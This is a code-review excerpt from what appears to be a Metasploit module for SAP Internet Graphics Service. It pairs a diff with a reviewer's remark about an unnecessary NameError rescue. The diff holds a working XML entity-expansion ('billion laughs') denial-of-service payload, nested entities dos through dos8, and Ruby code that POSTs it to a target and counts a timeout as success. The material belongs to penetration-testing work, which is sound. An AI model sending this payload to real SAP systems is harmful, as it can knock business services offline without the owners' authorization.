modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,420 @@
+    xxe_xml[:data] = %{<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [
+      <!ENTITY dos 'dos'>
+      <!ENTITY dos1 '&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;'>
+      <!ENTITY dos2 '&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;'>
+      <!ENTITY dos3 '&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;'>
+      <!ENTITY dos4 '&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;'>
+      <!ENTITY dos5 '&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;'>
+      <!ENTITY dos6 '&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;'>
+      <!ENTITY dos7 '&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;'>
+      <!ENTITY dos8 '&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;'>
+    ]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&dos8;</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>}
+
+    data = Rex::MIME::Message.new
+    data.add_part(data_xml[:data], 'application/xml', nil, "form-data; name=\"#{data_xml[:name]}\"; filename=\"#{data_xml[:filename]}\"")
+    data.add_part(xxe_xml[:data], 'application/xml', nil, "form-data; name=\"#{xxe_xml[:name]}\"; filename=\"#{xxe_xml[:filename]}\"")
+    # endregion
+
+    # region Send HTTP request
+    begin
+      dos_response = nil
+      dos_response = send_request_cgi(
+          {
+              'uri' => normalize_uri(@urn),
+              'method' => 'POST',
+              'ctype' => "multipart/form-data; boundary=#{data.bound}",
+              'data' => data.to_s,
+          }, @timeout
+      )
+    rescue Timeout::Error
+      report_vuln(
+          host: @host,
+          port: @port,
+          name: self.name,
+          refs: self.references
+      )
+      print_good("DOS SAP IGS #{@host}:#{@port}")
+    rescue => e
+      print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@urn}")
+      if @verbose
+        print_error("Error: #{e.class}: #{e}")
+      end
+    end
+
+    begin
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless dos_response.code != 200
+    rescue NameError
+      return Exploit::CheckCode::Safe
+    end
```

Comment:
Why is there a `rescue` statement here? This shouldn't be causing `NameErrors` and if it is, then it means that your code is not correctly checking for some condition earlier on in the code.